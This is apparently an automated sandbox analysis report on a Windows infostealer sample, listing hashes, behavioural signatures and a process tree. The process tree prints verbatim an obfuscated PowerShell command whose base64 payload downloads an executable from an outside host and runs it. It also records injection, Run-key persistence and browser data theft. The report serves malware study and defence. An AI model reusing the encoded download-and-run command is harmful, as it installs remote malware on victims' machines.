Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows7_x64 -
resource
win7 -
submitted
16-07-2020 06:19
Static task
static1
Behavioral task
behavioral1
Sample
6115b75d6dea7d18c4c335daee062579.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
6115b75d6dea7d18c4c335daee062579.exe
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
6115b75d6dea7d18c4c335daee062579.exe
-
Size
847KB
-
MD5
6115b75d6dea7d18c4c335daee062579
-
SHA1
edd36175f46101077bd6946a2324e10c4c3f73aa
-
SHA256
b0b9e3dc8734f410aa2312b54b09cd299d427f0b04b5c57c5cccc0b58fe966fa
-
SHA512
85ff43706d9e45c376bc72bb4040b5ad0e3480f479074758502e217e82f46021eddafbd9eef08a1b5d0ecb8e64bdcb15043643f858a8bf7eb2ee95da6369aaaf
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 32 IoCs
pid Process 1184 powershell.exe 1184 powershell.exe 1448 powershell.exe 1448 powershell.exe 768 MdPSvg.exe 768 MdPSvg.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe -
Executes dropped EXE 1 IoCs
pid Process 768 MdPSvg.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
pid Process 768 MdPSvg.exe 768 MdPSvg.exe 768 MdPSvg.exe 1056 help.exe 1056 help.exe 1056 help.exe 1056 help.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 768 set thread context of 1248 768 MdPSvg.exe 20 PID 1056 set thread context of 1248 1056 help.exe 20 -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Xczadhdz\configxrwhgb.exe help.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1156 wrote to memory of 1184 1156 6115b75d6dea7d18c4c335daee062579.exe 24 PID 1156 wrote to memory of 1184 1156 6115b75d6dea7d18c4c335daee062579.exe 24 PID 1156 wrote to memory of 1184 1156 6115b75d6dea7d18c4c335daee062579.exe 24 PID 1156 wrote to memory of 1184 1156 6115b75d6dea7d18c4c335daee062579.exe 24 PID 1184 wrote to memory of 1448 1184 powershell.exe 26 PID 1184 wrote to memory of 1448 1184 powershell.exe 26 PID 1184 wrote to memory of 1448 1184 powershell.exe 26 PID 1184 wrote to memory of 1448 1184 powershell.exe 26 PID 1448 wrote to memory of 768 1448 powershell.exe 27 PID 1448 wrote to memory of 768 1448 powershell.exe 27 PID 1448 wrote to memory of 768 1448 powershell.exe 27 PID 1448 wrote to memory of 768 1448 powershell.exe 27 PID 1248 wrote to memory of 1056 1248 Explorer.EXE 28 PID 1248 wrote to memory of 1056 1248 Explorer.EXE 28 PID 1248 wrote to memory of 1056 1248 Explorer.EXE 28 PID 1248 wrote to memory of 1056 1248 Explorer.EXE 28 PID 1056 wrote to memory of 1552 1056 help.exe 29 PID 1056 wrote to memory of 1552 1056 help.exe 29 PID 1056 wrote to memory of 1552 1056 help.exe 29 PID 1056 wrote to memory of 1552 1056 help.exe 29 PID 1056 wrote to memory of 2032 1056 help.exe 34 PID 1056 wrote to memory of 2032 1056 help.exe 34 PID 1056 wrote to memory of 2032 1056 help.exe 34 PID 1056 wrote to memory of 2032 1056 help.exe 34 PID 1056 wrote to memory of 2032 1056 help.exe 34 -
Blacklisted process makes network request 1 IoCs
flow pid Process 4 1448 powershell.exe -
Loads dropped DLL 2 IoCs
pid Process 1448 powershell.exe 1448 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1248 Explorer.EXE 1248 Explorer.EXE 1248 Explorer.EXE 1248 Explorer.EXE 1248 Explorer.EXE -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run help.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\MJMPLR58_P = "C:\\Program Files (x86)\\Xczadhdz\\configxrwhgb.exe" help.exe -
description ioc Process Key created \Registry\User\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 help.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeDebugPrivilege 768 MdPSvg.exe Token: SeDebugPrivilege 1056 help.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1248 Explorer.EXE 1248 Explorer.EXE 1248 Explorer.EXE 1248 Explorer.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Suspicious use of SendNotifyMessage
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\6115b75d6dea7d18c4c335daee062579.exe"C:\Users\Admin\AppData\Local\Temp\6115b75d6dea7d18c4c335daee062579.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwADoALwAvAHYAaQBjAHQAbwByAGMAYQBsAHYAbwBhAHIAcQB1AGkAdABlAGMAdABvAC4AZQBzAC8AMQAvAGIAaQBuAGEALgBlAHgAZQAdICAALAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABNAGQAUABTAHYAZwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABNAGQAUABTAHYAZwAuAGUAeABlAB0g3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
PID:1184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwADoALwAvAHYAaQBjAHQAbwByAGMAYQBsAHYAbwBhAHIAcQB1AGkAdABlAGMAdABvAC4AZQBzAC8AMQAvAGIAaQBuAGEALgBlAHgAZQAdICAALAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABNAGQAUABTAHYAZwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABNAGQAUABTAHYAZwAuAGUAeABlAB0g4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Drops file in System32 directory
PID:1448 -
C:\Users\Admin\AppData\Local\Temp\MdPSvg.exe"C:\Users\Admin\AppData\Local\Temp\MdPSvg.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
-
-
-
C:\Windows\SysWOW64\help.exe"C:\Windows\SysWOW64\help.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Adds Run key to start application
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
PID:1056 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\MdPSvg.exe"3⤵PID:1552
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:2032
-
-